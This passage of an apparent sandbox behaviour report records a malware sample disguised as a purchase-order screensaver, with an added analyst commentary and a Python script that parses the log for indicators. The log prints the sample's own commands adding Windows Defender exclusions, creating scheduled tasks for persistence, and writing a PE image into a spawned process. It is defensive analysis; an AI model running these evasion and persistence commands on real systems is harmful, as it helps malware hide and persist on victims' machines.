Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3507
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1824
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2512
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3268
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Window / User API: threadDelayed 358
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 373
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1798
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2297
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2525
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1266
Source: C:\Windows\System32\msdtc.exe | Window / User API: threadDelayed 401
Source: C:\Windows\SysWOW64\perfhost.exe | Window / User API: threadDelayed 607
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Window / User API: threadDelayed 580
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\System32\VSSVC.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exe
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Dropped PE file which has not been started: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\System32\sppsvc.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\System32\dllhost.exe
Source: C:\Users\user\Desktop\PO#_1100015533.scr TID: 3272 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3476 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3552 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3524 | Thread sleep count: 2512 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3524 | Thread sleep count: 3268 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3612 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3620 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3504 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\PO#_1100015533.scr TID: 3696 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\taskeng.exe TID: 3708 | Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe TID: 3776 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 4040 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 3812 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe TID: 3980 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 3976 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4068 | Thread sleep count: 373 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1884 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 928 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4056 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3908 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2060 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3520 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1992 | Thread sleep count: 2525 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1992 | Thread sleep count: 1266 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2456 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3032 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1048 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\ehome\ehrecvr.exe TID: 3540 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\ehome\ehsched.exe TID: 3504 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\ieetwcollector.exe TID: 3920 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\msdtc.exe TID: 2720 | Thread sleep count: 401 > 30
Source: C:\Windows\System32\msdtc.exe TID: 2720 | Thread sleep time: -40100s >= -30000s
Source: C:\Windows\System32\msiexec.exe TID: 4076 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\perfhost.exe TID: 2672 | Thread sleep count: 607 > 30
Source: C:\Windows\SysWOW64\perfhost.exe TID: 2672 | Thread sleep time: -6070000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 4032 | Thread sleep time: -34800000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 4032 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\vds.exe TID: 2576 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\wbengine.exe TID: 152 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe TID: 824 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe TID: 1404 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\perfhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\perfhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\adobe\
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Esl\
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\ENU\
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Process token adjusted: Debug
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr"
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr"
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Memory written: C:\Users\user\Desktop\PO#_1100015533.scr base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Memory written: C:\Users\user\AppData\Roaming\hVVSnrrP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr"
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp"
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process created: C:\Users\user\Desktop\PO#_1100015533.scr "C:\Users\user\Desktop\PO#_1100015533.scr"
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe C:\Users\user\AppData\Roaming\hVVSnrrP.exe
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmp2972.tmp"
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Process created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Process created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Process created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Process created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:02 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
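The process-creation and memory-write entries above carry the three behaviours an analyst should act on: Windows Defender exclusions added through Add-MpPreference for the dropped binaries and the ACCApi directory; persistence through schtasks, once as a task imported from an XML staged in the user's Temp directory and once as a daily task with a one-minute repeat interval that points at apihost.exe under AppData; and a PE image (value starts with 4D5A) written at base 400000 of a newly spawned copy of the same executable, the hollowing pattern that the self-spawn entries also show. The sleep evidence is weaker on its own: 922337203685477 and its exact multiples are, in my reading of this report, how an infinite relative wait (a parked thread) is rendered, and the memory-write-watch reservations earlier in the section are what the .NET runtime's garbage collector does for every managed process, powershell.exe included. The script below is an added example, not part of the Joe Sandbox report: it parses a handful of these entries, constructed here and normalised to a "Source: <path> [TID: n] | <event>: <detail>" layout of my own, and pulls out those indicators. The regular expressions, the suspicion heuristics and the INFINITE_WAIT constant are mine.

```python
"""Triage of Joe Sandbox behaviour entries (added example; not code from the report)."""
import re

# Constructed sample: entries copied from this section and normalised to
# "Source: <path> [TID: n] | <event>: <detail>". The layout is mine, not raw sandbox output.
SAMPLE = r"""
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:02 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Memory written: C:\Users\user\Desktop\PO#_1100015533.scr base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Process created: C:\Users\user\Desktop\PO#_1100015533.scr "C:\Users\user\Desktop\PO#_1100015533.scr"
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Memory written: C:\Users\user\AppData\Roaming\hVVSnrrP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe TID: 3776 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 928 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\taskeng.exe TID: 3708 | Thread sleep time: -120000s >= -30000s
"""

ENTRY_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)(?:\s+TID:\s*(?P<tid>\d+))?\s*\|\s*(?P<event>[^:]+?):\s*(?P<detail>.*)$"
)
EXCLUSION_RE = re.compile(r"Add-MpPreference\s+-ExclusionPath\s+[\"']([^\"']+)[\"']", re.I)
TASK_NAME_RE = re.compile(r"/tn\s+\"?([^\"\s]+)", re.I)
TASK_XML_RE = re.compile(r"/xml\s+\"([^\"]+)\"", re.I)
TASK_RUN_RE = re.compile(r"/tr\s+\"([^\"]+)\"", re.I)
MEM_WRITE_RE = re.compile(
    r"^(?P<target>.+?)\s+base:\s*(?P<base>[0-9A-Fa-f]+)\s+value starts with:\s*(?P<magic>[0-9A-Fa-f]+)"
)
SLEEP_RE = re.compile(r"^-(?P<ms>\d+)s\s*>=\s*-30000s")
# My reading of this report: this value renders an infinite relative wait; exact
# multiples of it show up when one thread parks itself more than once.
INFINITE_WAIT = 922337203685477


def parse(text):
    """Split normalised entries into dicts with src, tid, event and detail."""
    entries = []
    for line in text.strip().splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def defender_exclusions(entries):
    """Map each path passed to Add-MpPreference -ExclusionPath to the processes that added it."""
    found = {}
    for e in entries:
        if e["event"] != "Process created":
            continue
        m = EXCLUSION_RE.search(e["detail"])
        if m:
            found.setdefault(m.group(1), set()).add(e["src"])
    return found


def scheduled_tasks(entries):
    """Extract schtasks /create invocations; flag XML staged in Temp or a run target under AppData."""
    tasks = []
    for e in entries:
        detail = e["detail"]
        if e["event"] != "Process created" or "schtasks" not in detail.lower():
            continue
        if not re.search(r"/create\b", detail, re.I):
            continue
        name, xml, run = (rx.search(detail) for rx in (TASK_NAME_RE, TASK_XML_RE, TASK_RUN_RE))
        task = {
            "name": name.group(1) if name else None,
            "xml": xml.group(1) if xml else None,
            "run": run.group(1) if run else None,
            "creator": e["src"],
        }
        task["suspicious"] = bool(
            (task["xml"] and "\\temp\\" in task["xml"].lower())
            or (task["run"] and "\\appdata\\" in task["run"].lower())
        )
        tasks.append(task)
    return tasks


def self_injection(entries):
    """Memory writes that place an MZ header into a process; 'self' marks a copy of the writer."""
    hits = []
    for e in entries:
        if e["event"] != "Memory written":
            continue
        m = MEM_WRITE_RE.match(e["detail"])
        if m and m.group("magic").upper().startswith("4D5A"):
            hits.append({"writer": e["src"], "target": m.group("target"),
                         "base": m.group("base"), "self": m.group("target") == e["src"]})
    return hits


def parked_threads(entries):
    """(src, tid, count) for threads whose sleep is an exact multiple of INFINITE_WAIT."""
    parked = []
    for e in entries:
        if e["event"] != "Thread sleep time":
            continue
        m = SLEEP_RE.match(e["detail"])
        if m and int(m.group("ms")) % INFINITE_WAIT == 0:
            parked.append((e["src"], e["tid"], int(m.group("ms")) // INFINITE_WAIT))
    return parked


if __name__ == "__main__":
    ents = parse(SAMPLE)
    print("Defender exclusions:", sorted(defender_exclusions(ents)))
    print("Scheduled tasks:", scheduled_tasks(ents))
    print("MZ written into a process:", self_injection(ents))
    print("Parked threads:", parked_threads(ents))
```

Run against an exported behaviour log in the same layout, the four functions give the exclusion paths to remove (Remove-MpPreference -ExclusionPath), the task names to delete, the hollowed child processes whose memory is worth dumping, and the parked threads to discount when judging whether a sample is stalling the sandbox. A timed wait such as the 120000 ms one from taskeng.exe is left alone, since it is a real timer rather than a parked thread.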
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Queries volume information: C:\Users\user\Desktop\PO#_1100015533.scr VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
